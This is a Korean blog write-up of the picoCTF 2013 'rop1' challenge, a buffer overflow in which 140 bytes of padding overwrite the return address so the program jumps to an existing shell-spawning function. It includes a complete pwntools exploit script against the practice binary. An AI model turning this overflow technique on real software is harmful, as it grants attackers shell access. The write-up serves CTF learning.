[pico CTF 2013] rop1
2018. 8. 15. 22:17ㆍCTF's Write-up
pico ctf rop1번 문제입니다.
pico rop1checksec 하고!
바이너리까보면 취약한 함수라고 손수 알려주는군요 ㅎㅎ
88만큼받는데 무려..100을 ㅎㅎ BOF
어떻게 rop를 만들까 생각해보니까 마침 부르지말라는 곳에 shell호출하는 함수가 있네요! :)
그냥 exploit하죠!!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | from pwn import * r = process("./pico_rop1") system = 0x080484A4 payload = "" payload += "A"*140 payload += p32(system) r.send(payload) r.interactive() | cs |
(grin)
'CTF's Write-up' 카테고리의 다른 글
| [pico CTF 2013] rop2 (0) | 2018.08.16 |
|---|---|
| [TJCTF2018] - Cookie monster (0) | 2018.08.16 |
| [TJCTF2018] - Weird Logo (0) | 2018.08.15 |
| [plaid CTF] ropasaurusrex (5) | 2018.08.14 |
| [TJCTF 2018] - Trippy (0) | 2018.08.14 |